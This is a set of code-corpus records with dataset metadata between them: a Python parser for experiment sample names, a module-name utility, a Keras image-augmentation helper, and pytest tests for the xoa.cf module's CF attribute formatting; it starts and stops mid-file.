'WT'\n\n def Compound(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.Compound(row)\n return 'none'\n\n def TreatmentDosage(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.TreatmentDosage(row)\n return '-'\n\n def TreatmentGroup(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.TreatmentGroup(row)\n return 'invitro'\n\n\n@parser_factory.register(['AA292', 'AA269', 'AA324'])\nclass TMGTIDParser3(ExperimentParser):\n \"\"\"\n Parse a mix of invitro and invivo samples.\n invivo samples are treated with HDM201.\n \"\"\"\n\n def _invitro(self, row):\n sname = self._sname(row)\n return 'spleen' in sname and 'cell' in sname\n\n def SampleName(self, row):\n if self._invitro(row):\n sname = self._sname(row)\n p = r'ATP[1|2]-(\\S+)'\n match = re.search(p, sname).group(1)\n return '{}_{}'.format(match, self.PbAnnot(row))\n return super(TMGTIDParser3, self).SampleName(row)\n\n def PbType(self, row):\n sname = self._sname(row)\n pos = sname.find('ATP')\n return \"ATP{}\".format(sname[pos+3])\n\n def StudyId(self, row):\n if self._invitro(row):\n return '-'\n sname = self._sname(row)\n p = r'ATP[1|2]-(\\d+)-'\n match = re.search(p, sname)\n return match.group(1)\n\n def Tumor(self, row):\n if self._invitro(row):\n return '-'\n return super(TMGTIDParser3, self).Tumor(row)\n\n def Barcode(self, row):\n if self._invitro(row):\n return '-'\n return super(TMGTIDParser3, self).Barcode(row)\n\n def GeneticBackground(self, row):\n if self._invitro(row):\n return \"WT\"\n sname = self._sname(row)\n p = r'(arf|ink4aarf|braf)'\n matches = re.findall(p, sname.lower())\n if len(matches) == 0:\n return \"WT\"\n if len(matches) > 1:\n raise ValueError('More than one background for {}'\n .format(sname))\n group = matches[0]\n if group == 'arf':\n return 'ARFKO'\n if group == 'ink4aarf':\n return 'Ink4aARFKO'\n if group == 'braf':\n return 'BrafV600E'\n raise ValueError(\"Invalid genetic background {} for {}\"\n .format(group, sname))\n\n def _treatgroup(self, row):\n p = r'(-DR-|-DRins-|-DRsens-|-Veh-)'\n sname = self._sname(row)\n matches = re.findall(p, sname)\n if len(matches) == 0:\n return None\n if len(matches) != 1:\n raise ValueError(\"Invalid treatment group for {}\"\n .format(sname))\n return matches[0].replace('-', '').lower()\n\n def Compound(self, row):\n if self._invitro(row):\n return \"none\"\n treat_group = self._treatgroup(row)\n if treat_group is None:\n return \"none\"\n if treat_group == 'veh':\n return 'Vehicule'\n sname = self._sname(row)\n p = r'(HDM201|ABT263|ABT199)'\n matches = re.findall(p, sname)\n if len(matches) == 0:\n raise ValueError(\"Could not match compound for {}\"\n .format(sname))\n compound = '+'.join(matches)\n return compound\n\n def TreatmentDosage(self, row):\n if self._invitro(row):\n return \"-\"\n compounds = self.Compound(row)\n if compounds == \"none\":\n return \"-\"\n sname = self._sname(row)\n compounds = compounds.split('+')\n doses = []\n for cmp in compounds:\n pos = sname.find(cmp) + len(cmp) + 1\n s = sname[pos:]\n t = s.split('-')\n doses.append(t[0])\n return '+'.join(doses)\n\n def TreatmentGroup(self, row):\n if self._invitro(row):\n return \"invitro\"\n treat_group = self._treatgroup(row)\n if treat_group is None:\n if self.PassageNumber(row) >= 0:\n return 'spontaneous_passage'\n tokens = self._tokenize(row, '-')\n group = tokens[-1].lower()\n if group == 'ma':\n group = tokens[-2].lower()\n assert group == \"xtm\"\n return GROUP_TO_TREATMENTGROUP[group]\n # Treated sample, group is resistant or untreated\n return GROUP_TO_TREATMENTGROUP[treat_group]\n","sub_path":".atom/recovery/tmgt_various-238f75.py","file_name":"tmgt_various-238f75.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"454427425","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nModule Docstring\r\n\"\"\"\r\n\r\n__author__ = \"Chris Advena\"\r\n__version__ = \"0.0.1\"\r\n__license__ = \"MIT\"\r\n\r\n\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Utilities\r\n# ------------------------------------------------------------------------------\r\n\r\ndef get_mod_name():\r\n \"\"\"\r\n\r\n :return: the name of this module as extracted from the filename.\r\n \"\"\"\r\n try:\r\n mod_filename = sys._getframe(0).f_globals['__file__']\r\n except:\r\n '''\r\n According to \r\n https://stackoverflow.com/questions/1095543/get-name-of-calling-functions-module-in-python,\r\n 'the inspect.stack code FAILS after compile to exe using pyinstaller, \r\n but using sys._current_frames WORKS FINE.' So, I elected to use the \r\n try sys._getframe() function before using inpect.stack, as shown in the\r\n code here:\r\n '''\r\n caller_frame = stack()[1]\r\n mod_filename = caller_frame.filename\r\n\r\n caller_base_name = basename(mod_filename)\r\n return splitext(caller_base_name)[0]\r\n\r\n\r\ndef get_caller_mod_name():\r\n \"\"\"\r\n\r\n :return: name of the module 1 level up in the stack as extracted from the\r\n filename.\r\n \"\"\"\r\n try:\r\n caller_frame = sys._getframe(1)\r\n caller_filename = caller_frame.f_globals['__file__']\r\n except:\r\n # see notes in get_mod_name(), above.\r\n caller_frame = stack()[1]\r\n caller_filename = caller_frame.filename\r\n\r\n caller_base_name = basename(caller_filename)\r\n return splitext(caller_base_name)[0]\r\n return caller_mod_name\r\n\r\n","sub_path":".github/workflows/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"446573795","text":"'''\r\nAugmentImages.py\r\nElliot Trapp\r\n18/12/3\r\n\r\nUtilities for augmenting image training data to create dynamic training data.\r\n'''\r\n\r\nimport numpy as np\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\ndef GetTrainGenerator(load_dir, batch_size=32, target_size=(150,150), validation_split=0.0):\r\n\r\n # this is the augmentation configuration we will use for training\r\n train_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n validation_split=validation_split,\r\n #preprocessing_function=preprocess_input\r\n )\r\n\r\n # this is a generator that will read pictures found in\r\n # subfolers of 'data/train', and indefinitely generate\r\n # batches of augmented image data\r\n\r\n train_generator = train_datagen.flow_from_directory(\r\n directory=load_dir, # this is the target directory\r\n target_size=target_size, # all images will be resized to 150x150\r\n batch_size=batch_size,\r\n class_mode='categorical',\r\n subset='training') # since we use binary_crossentropy loss, we need binary labels\r\n\r\n return train_generator\r\n\r\ndef GetTestGenerator(load_dir, batch_size=32, target_size=(150,150), validation_split=0.0):\r\n\r\n # this is the augmentation configuration we will use for testing:\r\n # only rescaling\r\n test_datagen = ImageDataGenerator(rescale=1./255,\r\n validation_split=validation_split,\r\n # preprocessing_function=preprocess_input\r\n )\r\n\r\n # this is a similar generator, for validation data\r\n test_generator = test_datagen.flow_from_directory(\r\n directory=load_dir,\r\n target_size=target_size,\r\n batch_size=batch_size,\r\n class_mode='categorical',\r\n subset='validation')\r\n\r\n return test_generator","sub_path":"AugmentImages.py","file_name":"AugmentImages.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"196922722","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nTest the :mod:`xoa.cf` module\n\"\"\"\n\n# from unittest.mock import Mock\nimport warnings\nimport pytest\n\nimport numpy as np\nimport xarray as xr\n\nimport xoa\nfrom xoa import cf\n\n\n@pytest.mark.parametrize(\n \"attr,value,expected\",\n [\n (\"standard_name\", \"my_var_at_t_location\", (\"my_var\", \"t\")),\n (\"standard_name\", \"my_var\", (\"my_var\", None)),\n (\"long_name\", \"My var at T location\", (\"My var\", \"t\")),\n (\"name\", \"myvar_t\", (\"myvar\", \"t\")),\n ],\n)\ndef test_cf_sglocator_parse_attr(attr, value, expected):\n assert cf.SGLocator().parse_attr(attr, value) == expected\n\n\n@pytest.mark.parametrize(\n \"attr,value,expected\",\n [\n (\"standard_name\", \"my_var_at_t_location\", (\"my_var_at_t_location\", None)),\n (\"standard_name\", \"my_var_at_u_location\", (\"my_var\", \"u\")),\n (\"long_name\", \"My var at RHO location\", (\"My var\", \"rho\")),\n (\"long_name\", \"My var at rho location\", (\"My var\", \"rho\")),\n (\"name\", \"myvarrho\", (\"myvar\", \"rho\")),\n ],\n)\ndef test_cf_sglocator_parse_attr_with_valid_locations(attr, value, expected):\n assert (\n cf.SGLocator(valid_locations=['u', 'rho'], name_format=\"{root}{loc}\",).parse_attr(\n attr, value\n )\n == expected\n )\n\n\n@pytest.mark.parametrize(\n \"name,standard_name,long_name,loc\",\n [\n (\"u_t\", None, None, \"t\"),\n (None, \"u_at_t_location\", None, \"t\"),\n (None, None, \"U at T location\", \"t\"),\n (\"u_t\", \"_at_t_location\", \"U at T location\", \"t\"),\n (\"u\", \"u_at_t_location\", None, \"t\"),\n (\"u\", \"u\", \"U\", None),\n ],\n)\ndef test_cf_sglocator_get_loc_from_da(name, standard_name, long_name, loc):\n\n da = xr.DataArray(0)\n if name:\n da.name = name\n if standard_name:\n da.attrs[\"standard_name\"] = standard_name\n if long_name:\n da.attrs[\"long_name\"] = long_name\n\n parsed_loc = cf.SGLocator().get_loc_from_da(da)\n assert parsed_loc == loc\n\n\n@pytest.mark.parametrize(\n \"name,standard_name,long_name\",\n [\n (\"u_t\", \"u_at_u_location\", None),\n (None, \"u_at_t_location\", \"U at U location\"),\n (\"u_u\", None, \"U at T location\"),\n (\"u_u\", \"u_at_w_location\", \"U at T location\"),\n ],\n)\ndef test_cf_sglocator_get_loc_from_da_error(name, standard_name, long_name):\n\n da = xr.DataArray(0)\n if name:\n da.name = name\n if standard_name:\n da.attrs[\"standard_name\"] = standard_name\n if long_name:\n da.attrs[\"long_name\"] = long_name\n\n with pytest.raises(cf.XoaCFError):\n cf.SGLocator().get_loc_from_da(da, errors=\"raise\")\n\n cf.SGLocator().get_loc_from_da(da, errors=\"ignore\")\n\n\n@pytest.mark.parametrize(\n \"attr,root,loc,expected\",\n [\n (\"standard_name\", \"my_var\", \"t\", True),\n (\"standard_name\", \"my_var2\", \"t\", False),\n (\"standard_name\", \"my_var\", \"x\", False),\n (\"standard_name\", \"my_var\", None, True),\n (\"standard_name\", \"my_var\", \"xtu\", True),\n (\"long_name\", \"My var\", \"t\", True),\n (\"long_name\", \"My var\", \"x\", False),\n (\"name\", \"myvar\", \"t\", True),\n (\"name\", \"myvar\", \"x\", False),\n ],\n)\ndef test_cf_sglocator_match_attr(attr, root, loc, expected):\n value = dict(\n standard_name=\"my_var_at_t_location\", long_name=\"My var at T location\", name=\"myvar_t\",\n )[attr]\n assert cf.SGLocator().match_attr(attr, value, root, loc) is expected\n\n\n@pytest.mark.parametrize(\n \"attr,root,loc,expected\",\n [\n (\"standard_name\", \"my_var\", \"t\", \"my_var_at_t_location\"),\n (\"standard_name\", \"my_var\", \"\", \"my_var\"),\n (\"long_name\", \"My var\", \"t\", \"My var at T location\"),\n (\"name\", \"myvar\", \"t\", \"myvar_t\"),\n ],\n)\ndef test_cf_sglocator_format_attr(attr, root, loc, expected):\n assert cf.SGLocator().format_attr(attr, root, loc) == expected\n\n\ndef test_cf_sglocator_format_attr_valid_locations():\n with pytest.raises(cf.XoaCFError) as excinfo:\n cf.SGLocator(valid_locations=\"x\").format_attr(\"name\", \"banana\", \"y\")\n assert str(excinfo.value) == (\n 'Location \"y\" is not recognised by the currents '\n 'specifications. Registered locations are: x'\n )\n\n\ndef test_cf_sglocator_format_attrs_no_loc():\n attrs = {\n \"name\": \"u_u\",\n \"standard_name\": \"banana_at_t_location\",\n \"long_name\": \"Banana at T location\",\n \"int_attr\": 10,\n \"str_attr\": \"good\",\n }\n\n fmt_attrs = cf.SGLocator().format_attrs(attrs, loc='')\n assert fmt_attrs[\"name\"] == \"u_u\"\n assert fmt_attrs[\"standard_name\"] == \"banana\"\n assert fmt_attrs[\"long_name\"] == \"Banana\"\n for attr in (\"int_attr\", \"str_attr\"):\n assert fmt_attrs[attr] == attrs[attr]\n\n\ndef test_cf_sglocator_format_attrs_with_loc():\n attrs = {\n \"name\": \"u_u\",\n \"standard_name\": \"banana_at_t_location\",\n \"long_name\": \"Banana\",\n \"int_attr\": 10,\n \"str_attr\": \"good\",\n }\n\n fmt_attrs = cf.SGLocator().format_attrs(attrs, loc=\"f\")\n assert fmt_attrs[\"name\"] == \"u_u\"\n assert fmt_attrs[\"standard_name\"] == \"banana_at_f_location\"\n assert fmt_attrs[\"long_name\"] == \"Banana at F location\"\n for attr in (\"int_attr\", \"str_attr\"):\n assert fmt_attrs[attr] == attrs[attr]\n\n\n@pytest.mark.parametrize(\n \"value0, value1, loc, value\",\n [\n (\"sst\", None, \"t\", \"sst_t\"),\n (None, \"sst\", \"t\", \"sst_t\"),\n (\"sst\", \"sss\", \"t\", \"sss_t\"),\n (\"sst_x\", \"sss_y\", \"t\", \"sss_t\"),\n (\"sst_t\", None, None, \"sst_t\"),\n (None, \"sst_t\", None, \"sst_t\"),\n (\"sst_x\", \"sss_y\", None, \"sss_y\"),\n (\"sst_x\", \"sss\", None, \"sss_x\"),\n (\"sst\", \"sss_y\", None, \"sss_y\"),\n ],\n)\ndef test_cf_sglocator_merge_attr(value0, value1, loc, value):\n out = cf.SGLocator().merge_attr(\"name\", value0, value1, loc)\n assert out == value\n\n\n@pytest.mark.parametrize(\n \"isn, psn, osn, loc, replace\",\n [\n (\"sst\", None, \"sst\", None, False),\n (None, \"sst\", \"sst\", None, False),\n (\"sst\", \"temp\", \"sst\", None, False),\n (\"sst\", \"temp\", \"temp\", None, True),\n (\"sst_at_t_location\", \"temp_at_u_location\", \"sst_at_t_location\", None, False),\n (\"sst_at_t_location\", \"temp_at_u_location\", \"temp_at_u_location\", None, True),\n (\"sst\", \"temp\", \"sst_at_u_location\", \"u\", False),\n (\"sst\", \"temp\", \"temp_at_u_location\", \"u\", True),\n (\"sst_at_t_location\", \"temp_at_x_location\", \"sst_at_u_location\", \"u\", False),\n (\"sst_at_t_location\", \"temp_at_x_location\", \"temp_at_u_location\", \"u\", True),\n ],\n)\ndef test_cf_sglocator_patch_attrs(isn, psn, osn, loc, replace):\n\n iattrs = {\"units\": \"m\", \"color\": \"blue\"}\n patch = {\"cmap\": \"viridis\", \"mylist\": [1, 2], \"units\": \"cm\"}\n if isn:\n iattrs[\"standard_name\"] = isn\n if psn:\n patch[\"standard_name\"] = psn\n\n oattrs = cf.SGLocator().patch_attrs(iattrs, patch, loc=loc, replace=replace)\n\n assert oattrs[\"units\"] == (\"cm\" if replace else \"m\")\n assert oattrs[\"color\"] == \"blue\"\n assert oattrs[\"cmap\"] == \"viridis\"\n assert oattrs[\"mylist\"] == [1, 2]\n\n assert oattrs.get(\"standard_name\") == osn\n\n\n@pytest.mark.parametrize(\n \"floc,fname,fattrs,out_name,out_standard_name,replace_attrs\",\n [\n # (\"p\", None, None, \"banana_p\", \"banana_at_p_location\", False),\n # (None, None, None, \"banana_t\", \"banana\", False),\n # (\"p\", \"sst\", {\"standard_name\": \"potatoe\"}, \"sst_p\", \"banana_at_p_location\", False),\n # (\"p\", \"sst\", {\"standard_name\": \"potatoe\"}, \"sst_p\", \"potatoe_at_p_location\", True),\n # (\n # 'x',\n # \"sst\",\n # {\"standard_name\": [\"potatoe\", \"banana\"]},\n # \"sst_x\",\n # \"banana_at_x_location\",\n # True,\n # ),\n (None, \"sst_q\", {\"standard_name\": [\"potatoe\"]}, \"sst_q\", \"potatoe_at_q_location\", True),\n # (None, \"sst\", {\"standard_name\": [\"potatoe\"]}, \"sst_t\", \"potatoe_at_t_location\", True),\n ],\n)\ndef test_cf_sglocator_format_dataarray(\n floc, fname, fattrs, out_name, out_standard_name, replace_attrs\n):\n\n lon = xr.DataArray(range(5), dims=\"lon\")\n banana = xr.DataArray(\n lon + 20,\n dims=\"lon\",\n coords=[lon],\n name=\"banana_t\",\n attrs={\"standard_name\": \"banana\", \"taste\": \"good\"},\n )\n banana_fmt = cf.SGLocator().format_dataarray(\n banana, loc=floc, name=fname, attrs=fattrs, replace_attrs=replace_attrs\n )\n assert banana_fmt.name == out_name\n assert banana_fmt.standard_name == out_standard_name\n assert banana_fmt.taste == \"good\"\n\n\ndef test_cf_sglocator_format_dataarray_no_copy_no_rename():\n banana = xr.DataArray(1, name=\"banana_t\", attrs={\"standard_name\": \"banana\"})\n banana_fmt = cf.SGLocator().format_dataarray(banana, \"p\", copy=False, rename=False)\n assert banana_fmt is banana\n assert banana_fmt.name == \"banana_t\"\n assert banana_fmt.standard_name == \"banana_at_p_location\"\n\n\n@pytest.mark.parametrize(\"cache\", [\"ignore\", \"write\", \"rw\", \"read\", \"ignore\", \"clean\", \"rw\"])\ndef test_cf_get_cfg_specs(cache):\n assert isinstance(cf.get_cf_specs(cache=cache), cf.CFSpecs)\n\n\ndef test_cf_get_cfg_specs_var():\n specs = cf.get_cf_specs().data_vars[\"temp\"]\n assert specs[\"alt_names\"][0] == \"temperature\"\n assert specs[\"attrs\"][\"standard_name\"][0] == \"sea_water_temperature\"\n assert specs[\"cmap\"] == \"cmo.thermal\"\n new_specs = cf.get_cf_specs()[\"temp\"]\n assert new_specs is specs\n\n\ndef test_cf_get_cfg_specs_var_inherit():\n specs = cf.get_cf_specs().data_vars[\"sst\"]\n assert specs[\"attrs\"][\"standard_name\"][0] == \"sea_surface_temperature\"\n assert specs[\"attrs\"][\"units\"][0] == \"degrees_celsius\"\n\n\ndef test_cf_get_cfg_specs_coord():\n specs = cf.get_cf_specs().coords[\"lon\"]\n assert specs[\"alt_names\"][0] == \"longitude\"\n assert \"longitude\" in specs[\"alt_names\"]\n new_specs = cf.get_cf_specs()[\"lon\"]\n assert new_specs is specs\n\n\ndef test_cf_get_cfg_specs_coord_inherit():\n specs = cf.get_cf_specs().coords[\"depth\"]\n assert specs[\"alt_names\"][0] == \"dep\"\n assert specs[\"attrs\"][\"long_name\"][0] == \"Depth\"\n\n\n@pytest.mark.parametrize(\n \"cfg,key,name\",\n [\n ({\"data_vars\": {\"temp\": {\"alt_names\": \"mytemp\"}}}, \"temp\", \"mytemp\"),\n (\"[data_vars]\\n[[sal]]\\nalt_names=mysal\", \"sal\", \"mysal\"),\n ],\n)\ndef test_cf_cfspecs_load_cfg(cfg, key, name):\n cfspecs = cf.get_cf_specs()\n cfspecs.load_cfg(cfg)\n assert name in cfspecs[\"data_vars\"][key][\"alt_names\"]\n\n\ndef test_cf_cfspecs_copy():\n cfspecs0 = cf.get_cf_specs()\n cfspecs1 = cfspecs0.copy()\n assert id(cfspecs0._dict) != id(cfspecs1._dict)\n assert sorted(list(cfspecs0._dict[\"data_vars\"])) == sorted(list(cfspecs1._dict[\"data_vars\"]))\n assert cfspecs0._dict[\"coords\"] == cfspecs1._dict[\"coords\"]\n assert cfspecs0._dict[\"data_vars\"][\"temp\"] == cfspecs1._dict[\"data_vars\"][\"temp\"]\n assert \"temp\" in cfspecs1[\"data_vars\"]\n assert \"temperature\" in cfspecs1[\"data_vars\"][\"temp\"][\"alt_names\"]\n\n\ndef test_cf_set_cf_specs():\n cf.reset_cache(disk=False)\n cfspecs = cf.get_cf_specs()\n cf.set_cf_specs(cfspecs)\n cf_cache = cf._get_cache_()\n assert cf_cache[\"current\"] is cfspecs\n assert cf.get_cf_specs() is cfspecs\n\n\ndef test_cf_set_cf_specs_context():\n cfspecs0 = cf.get_cf_specs()\n cfspecs1 = cf.CFSpecs({\"data_vars\": {\"temp\": {\"alt_names\": \"tempouille\"}}})\n assert cf.get_cf_specs() is cfspecs0\n with cf.set_cf_specs(cfspecs1) as cfspecs:\n assert cfspecs is cfspecs1\n assert cf.get_cf_specs() is cfspecs1\n assert cf.get_cf_specs() is cfspecs0\n\n\n@pytest.mark.parametrize(\"specialize,expected\", [(False, \"temp\"), (True, \"temperature\")])\ndef test_cf_cfspecs_get_name(specialize, expected):\n cfspecs = cf.CFSpecs({\"data_vars\": {\"temp\": {\"name\": \"temperature\"}}})\n assert cfspecs.data_vars.get_name(\"temp\", specialize=specialize) == expected\n\n\ndef test_cf_cfspecs_get_attrs():\n cfspecs = cf.get_cf_specs()\n attrs = cfspecs.data_vars.get_attrs(\"temp\", other=\"ok\")\n assert attrs[\"long_name\"] == \"Temperature\"\n assert attrs[\"other\"] == \"ok\"\n\n\ndef test_cf_cfspecs_get_loc_mapping():\n\n cf_dict0 = {\n \"sglocator\": {\"valid_locations\": [\"u\", \"v\"],},\n \"data_vars\": {\n \"u\": {\"loc\": \"u\", \"add_loc\": False, \"add_coords_loc\": {\"lon\": True, \"x\": True},},\n \"bathy\": {\"add_loc\": True},\n },\n }\n cf_specs0 = cf.CFSpecs(cf_dict0)\n\n ds0 = xr.Dataset(\n {\"u\": ((\"time\", \"y\", \"x\"), np.ones((1, 2, 3))), \"bathy\": ((\"y\", \"x\"), np.ones((2, 3)))},\n coords={\n \"lon\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n\n locations = cf_specs0.get_loc_mapping(ds0)\n expected = {'u': False, 'lon': 'u', 'x': 'u', 'bathy': 'u', 'lat': None}\n assert set(locations.items()) == set(expected.items())\n\n\n@pytest.mark.parametrize(\"cf_name\", [None, \"lon\"])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\",\n [\n (\"lon\", None),\n (\"xxx\", {\"standard_name\": \"longitude\"}),\n (\"xxx\", {\"standard_name\": \"longitude_at_t_location\"}),\n (\"xxx\", {\"units\": \"degree_east\"}),\n ],\n)\ndef test_cf_cfspecs_match_coord(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims=in_name, name=in_name, attrs=in_attrs)\n res = cf.get_cf_specs().match_coord(lon, cf_name)\n if cf_name is None:\n assert res == 'lon'\n else:\n assert res is True\n\n\n@pytest.mark.parametrize(\"cf_name\", [\"lon\", None])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\",\n [\n (\"lon\", None),\n (\"xxx\", {\"standard_name\": \"longitude\"}),\n (\"xxx\", {\"standard_name\": \"longitude_at_t_location\"}),\n (\"xxx\", {\"units\": \"degree_east\"}),\n ],\n)\ndef test_cf_cfspecs_search_coord(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims=in_name, name=in_name, attrs=in_attrs)\n temp = xr.DataArray(range(20, 25), dims=in_name, coords={in_name: lon}, name='temp')\n res = cf.get_cf_specs().search_coord(temp, cf_name, get=\"cf_name\")\n assert res == 'lon'\n\n\ndef test_cf_cfspecs_search_coord_with_stacking():\n\n ds = xr.Dataset(\n coords={\n \"lon\": (\"lon\", np.linspace(-10, -2, 5)),\n \"lat\": (\"lat\", np.linspace(43, 49, 4)),\n }\n ).stack(npts=(\"lat\", \"lon\"))\n\n res = cf.get_cf_specs().search_coord(ds, \"lon\", get=\"obj\")\n assert res is not None\n assert res.shape == (20,)\n assert res.name == \"lon\"\n\n\n@pytest.mark.parametrize(\"cf_name\", [\"temp\", None])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\", [(\"temp\", None), (\"xxx\", {\"standard_name\": \"sea_water_temperature\"}),],\n)\ndef test_cf_cfspecs_match_data_var(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims='lon', name='lon')\n temp = xr.DataArray(\n range(20, 25), dims='lon', coords={'lon': lon}, name=in_name, attrs=in_attrs\n )\n res = cf.get_cf_specs().match_data_var(temp, cf_name)\n if cf_name is None:\n assert res == 'temp'\n else:\n assert res is True\n\n\n@pytest.mark.parametrize(\"cf_name\", [\"temp\", None])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\", [(\"temp\", None), (\"xxx\", {\"standard_name\": \"sea_water_temperature\"}),],\n)\ndef test_cf_cfspecs_search_data_var(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims='lon', name='lon')\n temp = xr.DataArray(\n range(20, 25), dims='lon', coords={'lon': lon}, name=in_name, attrs=in_attrs\n )\n ds = temp.to_dataset()\n assert cf.get_cf_specs().search_data_var(ds, cf_name, get=\"cf_name\") == 'temp'\n\n\ndef test_cf_cfspecs_cats_get_loc_arg():\n\n cf_dict0 = {\n \"sglocator\": {\"valid_locations\": [\"u\", \"v\"],},\n \"data_vars\": {\"u\": {\"loc\": \"u\", \"add_loc\": False, \"add_coords_loc\": {\"lon\": True},},},\n }\n cf_specs0 = cf.CFSpecs(cf_dict0)\n\n ds0 = xr.Dataset(\n {\"u\": ((\"time\", \"y\", \"x\"), np.ones((1, 2, 3))), \"bathy\": ((\"y\", \"x\"), np.ones((2, 3)))},\n coords={\n \"lon\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n\n assert cf_specs0.coords.get_loc_arg(ds0[\"u\"]) is None\n assert cf_specs0.coords.get_loc_arg(ds0[\"bathy\"]) is None\n assert cf_specs0.coords.get_loc_arg(ds0[\"lon\"]) is None\n\n locations0 = cf_specs0.get_loc_mapping(ds0)\n assert cf_specs0.coords.get_loc_arg(ds0[\"lon\"], locations=locations0) == \"u\"\n\n cf_dict1 = cf_dict0.copy()\n cf_dict1[\"data_vars\"][\"u\"][\"add_coords_loc\"][\"lon\"] = \"v\"\n cf_specs1 = cf.CFSpecs(cf_dict1)\n locations1 = cf_specs1.get_loc_mapping(ds0)\n assert cf_specs1.coords.get_loc_arg(ds0[\"lon\"], locations=locations1) == \"v\"\n\n\n@pytest.mark.parametrize(\"cf_name\", [None, \"lon\"])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\",\n [(\"lon\", None), (\"xxx\", {\"standard_name\": \"longitude\"}), (\"xxx\", {\"units\": \"degrees_east\"}),],\n)\ndef test_cf_cfspecs_cats_format_dataarray(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims=in_name, name=in_name, attrs=in_attrs)\n lon = cf.get_cf_specs().coords.format_dataarray(lon, cf_name)\n assert lon.name == \"lon\"\n assert lon.standard_name == \"longitude\"\n assert lon.long_name == \"Longitude\"\n assert lon.units == \"degrees_east\"\n\n\ndef test_cf_cfspecs_cats_format_dataarray_unknown():\n coord = xr.DataArray(range(5), name='foo')\n cfspecs = cf.get_cf_specs()\n\n coord_fmt = cfspecs.coords.format_dataarray(coord, rename=False)\n assert coord_fmt is None\n\n coord_fmt = cfspecs.coords.format_dataarray(coord, rename=True)\n assert coord_fmt.name == \"foo\"\n\n\ndef test_cf_cfspecs_cats_get_allowed_names():\n cfg = {\"data_vars\": {\"banana\": {\"name\": \"bonono\", \"alt_names\": [\"binini\", \"bununu\"]}}}\n cfspecs = cf.CFSpecs(cfg)\n assert cfspecs.data_vars.get_allowed_names(\"banana\") == ['banana', 'bonono', 'binini', 'bununu']\n\n\ndef test_cf_cfspecs_format_obj_with_loc():\n\n cf_dict0 = {\n \"sglocator\": {\"valid_locations\": [\"u\", \"v\"],},\n \"data_vars\": {\n \"u\": {\"loc\": \"u\", \"add_loc\": False, \"add_coords_loc\": {\"lon\": True, \"x\": True},},\n \"bathy\": {\"add_loc\": True},\n },\n }\n cf_specs0 = cf.CFSpecs(cf_dict0)\n\n ds0 = xr.Dataset(\n {\"u\": ((\"time\", \"y\", \"x\"), np.ones((1, 2, 3))), \"bathy\": ((\"y\", \"x\"), np.ones((2, 3)))},\n coords={\n \"lon\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n ds = cf_specs0.format_dataset(ds0)\n assert \"x_u\" in ds.dims\n assert \"y\" in ds.dims\n assert \"u\" in ds\n assert \"bathy_u\" in ds\n\n\n@pytest.mark.parametrize(\"cf_name\", [None, \"temp\"])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\", [(\"temp\", None), (\"yyy\", {\"standard_name\": \"sea_water_temperature\"}),],\n)\ndef test_cf_cfspecs_format_data_var(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims='xxx', name='xxx', attrs={'standard_name': 'longitude'})\n temp = xr.DataArray(\n range(20, 25), dims='xxx', coords={'xxx': lon}, name=in_name, attrs=in_attrs\n )\n temp = cf.get_cf_specs().format_data_var(temp, cf_name)\n assert temp.name == \"temp\"\n assert temp.standard_name == \"sea_water_temperature\"\n assert temp.long_name == \"Temperature\"\n assert temp.units == \"degrees_celsius\"\n assert temp.lon.standard_name == \"longitude\"\n\n\ndef test_cf_cfspecs_format_data_var_coord():\n da = xr.DataArray(0, attrs={'standard_name': 'longitude_at_u_location'})\n da = cf.get_cf_specs().format_data_var(da)\n\n\n# assert da.name == \"lon_u\"\n\n\ndef test_cf_cfspecs_format_data_var_specialize():\n da = xr.DataArray(1, name=\"salinity\")\n cfspecs = cf.CFSpecs({'data_vars': {'sal': {'name': 'supersal'}}})\n da = cfspecs.format_data_var(da, specialize=True)\n assert da.name == \"supersal\"\n assert da.standard_name == \"sea_water_salinity\"\n\n\ndef test_cf_cfspecs_format_data_var_loc():\n temp = xr.DataArray(0, name='xtemp', attrs={'standard_name': 'banana_at_x_location'})\n cfspecs = cf.get_cf_specs()\n\n temp_fmt = cfspecs.format_data_var(temp, \"temp\", format_coords=False, replace_attrs=True)\n assert temp_fmt.name == \"temp\"\n assert temp_fmt.standard_name == \"sea_water_temperature\" # _at_x_location\"\n\n cfspecs = cf.CFSpecs({\"data_vars\": {\"temp\": {\"add_loc\": True}}})\n temp_fmt = cfspecs.format_data_var(temp, \"temp\", format_coords=False, replace_attrs=True)\n assert temp_fmt.name == \"temp_x\"\n\n\ndef 